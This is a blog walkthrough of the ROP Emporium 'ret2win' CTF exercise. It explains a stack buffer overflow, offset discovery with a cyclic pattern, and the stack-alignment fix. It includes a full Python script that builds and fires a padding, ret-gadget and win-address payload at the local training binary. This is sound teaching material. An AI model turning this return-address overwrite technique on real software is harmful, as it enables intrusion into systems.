Friday, January 12, 2024

ROP EMPORIUM "ret2win" - Binary Exploitation Challenge [PWNED!!!] - My Walkthrough


In this hacking challenge, I go over how to exploit a stack buffer overflow to redirect program execution to an arbitrary address of our choosing. To get your head up to speed: a buffer overflow is a bug where a program writes more data into a fixed-size buffer than the buffer can hold, so the excess spills over into whatever is stored next to it in memory.

Suppose a buffer has been allocated with 10 bytes and 12 bytes are copied into it; the last 2 bytes land past the end of the buffer, and that is a buffer overflow. There are quite a few intricacies involved in actually exploiting one, such as knowing which input function is used and how many bytes it will accept, but that is the basic overview of the vulnerability.

In a classic CTF buffer overflow scenario, we would place shellcode on the stack and jump to it, either to run /bin/cat flag.txt or to perform an execve("/bin/sh", NULL, NULL) syscall and pop a shell on the remote server. Modern binaries (this one included) are built with a non-executable stack, which is why this challenge has us reuse code that already exists in the binary instead. To follow this writeup, you'll need a basic understanding of how the stack works in memory as well as some assembly language.

This challenge is called ret2win because there is a ret2win() function in the binary that prints the flag, and we need to jump to it. Stripping away the details: we overwrite the saved return address on the stack, so that when the vulnerable function reaches its ret instruction it pops our value into RIP and execution continues at ret2win() instead of returning to the caller.

To find the distance to the saved return address, a cyclic pattern is generated and fed to the program to induce a crash. pwndbg (a gdb extension for exploit development that makes debugging easier) shows which bytes of the pattern ended up in the registers and on the stack, and those bytes map back to an exact offset in the pattern.

The crash analysis shows the buffer is 32 bytes long. Add the 8 bytes of saved RBP that sit right after it on the stack and the saved return address starts 40 bytes into our input. Since that value is popped into RIP by the ret instruction and then executed, writing the address of ret2win() at offset 40 is enough to exploit the program.

A simple exploit script has been written to exploit the vulnerability and get the flag.

The script defines the challenge process, builds the payload from the 40-byte padding, a ret gadget address (to be explained after this lmao) and the ret2win() address, sends the payload to the local challenge process and reads back the output; if the first four characters match the flag format, the challenge has been pwned!

A small issue while developing the script was stack misalignment on Ubuntu 18.04 and up: glibc uses 16-byte aligned SSE instructions (movaps) inside functions such as system() and printf(), so the stack must be 16-byte aligned at the point of the call or the program segfaults inside libc. Jumping straight into ret2win() with a ret leaves RSP 8 bytes off from what a real call would produce, and a single extra ret gadget before the ret2win() address fixes that. Luckily, the ROP Emporium challenge creators hinted at this to make exploit development easier. That is the reason for the address in between the 40-byte padding and the ret2win address in the payload variable.

Running the script prints the flag.
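As an added example (this is not the script from the original post), here is a self-contained Python 3 version of the whole procedure that avoids pwntools: generating the cyclic pattern, mapping the crash value pwndbg shows back to an offset, and building the padding | ret | ret2win payload. The two addresses, the 56-byte input limit and the ROPE{...} flag prefix are assumptions for illustration; read the real values from your own copy of the binary with nm and objdump (or ROPgadget) before using it.

```python
#!/usr/bin/env python3
"""ret2win helper: cyclic pattern, offset lookup and payload builder.

Added example, not the script from the original post. It avoids pwntools so it
runs on a stock Python 3; the addresses below are assumptions and must be read
from your own copy of the binary (nm / objdump / ROPgadget).
"""
import itertools
import re
import string
import struct
import subprocess
import sys

# Assumed values for illustration only; confirm them with
#   nm ret2win | grep ret2win          (address of the win function)
#   objdump -d ret2win | grep -w ret   (any bare `ret` instruction)
RET2WIN_ADDR = 0x400756
RET_GADGET = 0x40053E
OFFSET = 40        # 32-byte buffer + 8-byte saved RBP, from the crash analysis
MAX_INPUT = 56     # assumed read() size of the vulnerable function; payload must fit


def _de_bruijn(alphabet: bytes, n: int):
    """Lazily yield the de Bruijn sequence B(k, n) (FKM algorithm): every n-byte
    window is unique, so a window seen in a crash maps to exactly one offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """Same pattern as pwntools' cyclic(): lowercase letters, unique 4-byte windows."""
    return bytes(itertools.islice(_de_bruijn(string.ascii_lowercase.encode(), n), length))


def cyclic_find(value, n: int = 4, maxlen: int = 4096) -> int:
    """Map a crashed register or stack value back to its offset in the pattern.

    `value` is either the raw bytes seen in memory or the integer pwndbg prints
    (e.g. RSP -> 0x6161616c6161616b); only the low n bytes are used."""
    if isinstance(value, int):
        value = value.to_bytes(8, "little")
    offset = cyclic(maxlen, n).find(value[:n])
    if offset < 0:
        raise ValueError("value is not part of the cyclic pattern")
    return offset


def build_payload(win_addr: int = RET2WIN_ADDR, ret_gadget=RET_GADGET, offset: int = OFFSET) -> bytes:
    """padding | ret gadget | win address, each address as little-endian 64-bit."""
    payload = b"A" * offset
    if ret_gadget is not None:
        # The extra `ret` pops 8 more bytes, so ret2win() is entered with RSP == 8 (mod 16)
        # exactly as a real `call` would leave it; without it glibc's movaps can fault.
        payload += struct.pack("<Q", ret_gadget)
    payload += struct.pack("<Q", win_addr)
    if len(payload) > MAX_INPUT:
        raise ValueError(f"payload is {len(payload)} bytes, the program only reads {MAX_INPUT}")
    return payload


def extract_flag(output: bytes, prefix: bytes = b"ROPE{"):
    """Pull the flag out of the program's output (the ROPE{...} format is assumed)."""
    m = re.search(re.escape(prefix) + rb"[^}]*\}", output)
    return m.group(0) if m else None


def run_exploit(binary: str, payload: bytes) -> bytes:
    """Feed the payload to a local copy of the challenge and return its stdout."""
    proc = subprocess.run([binary], input=payload + b"\n", capture_output=True, timeout=5)
    return proc.stdout


if __name__ == "__main__":
    if len(sys.argv) == 2 and sys.argv[1] == "cyclic":
        sys.stdout.buffer.write(cyclic(MAX_INPUT))   # stage 1: pattern to crash the program under gdb
    elif len(sys.argv) == 2:
        flag = extract_flag(run_exploit(sys.argv[1], build_payload()))   # stage 2: real payload
        print(flag.decode() if flag else "no flag in output; check the addresses")
    else:
        print(f"usage: {sys.argv[0]} cyclic | {sys.argv[0]} ./ret2win")
```

Stage 1 is `python3 exploit.py cyclic > pattern.txt`, then `r < pattern.txt` inside gdb/pwndbg; with a 32-byte buffer the crash shows RBP holding 0x6161616a61616169 (offset 32) and the bytes at RSP holding 0x6161616c6161616b (offset 40), which cyclic_find() maps back for you. Stage 2 is `python3 exploit.py ./ret2win` with flag.txt in the current directory. Passing ret_gadget=None builds the 48-byte payload without the alignment fix, which is the version that crashes inside libc on newer Ubuntu.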

Challenge complete!